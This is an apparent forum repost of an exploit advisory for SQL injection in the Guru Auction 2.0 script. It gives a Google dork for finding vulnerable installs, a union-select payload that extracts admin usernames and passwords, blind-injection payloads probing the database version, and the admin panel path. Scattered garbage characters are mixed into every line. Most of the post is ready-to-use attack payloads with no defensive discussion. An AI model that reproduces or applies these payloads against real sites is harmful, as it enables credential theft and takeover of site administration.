Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
& B! ]& r7 p6 R1 f4 m
; h; ~( L( b; j6 X作者 : v3n0m1 ~7 ~) }& M0 g5 d* F7 O5 M/ h
应用 : Guru Auction 2.08 W. g8 T. u- ]
Price : $493 f! [, ]. p5 ^
Vendor : http://www.guruscript.com/* \6 e3 b1 R: D5 X) U
Google Dork : inurl:subcat.php?cate_id=+ |( @! S3 B z- t* K2 U( ^" r) w: B
- c" Q s" d) z* \
SQLi p0c:- r* ?& j! d: g3 `0 E4 C2 I
~~~~~~~~~~
( j0 f/ l( v9 x/ m8 \4 Ohttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--+ L6 X9 C( g6 k9 }: l- h0 K
/ j, W- O% L b8 F
$ U* t0 Q% i! V, C+ t' x% {( V/ P# y5 h盲注 p0c:
! N! p) b% ]/ _5 y- n" ?, q1 ]( ]~~~~~~~~~~
W. h2 M7 c8 k0 H7 |http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
* }( k1 Z3 c( v# v, Zhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
+ F' }* X. i! [" q : }, P/ i7 Q' q) q/ B
管理登录入口:& d2 ]4 i* R7 [% X' I
~~~~~~~~~~8 {, ^% X6 @( S/ }" ]& L2 M
http://domain.tld/[path]/admin/
1 j G8 w" Y$ b( w/ Z, d1 C |
发表于 2012-12-31 09:24:05
收藏
支持
反对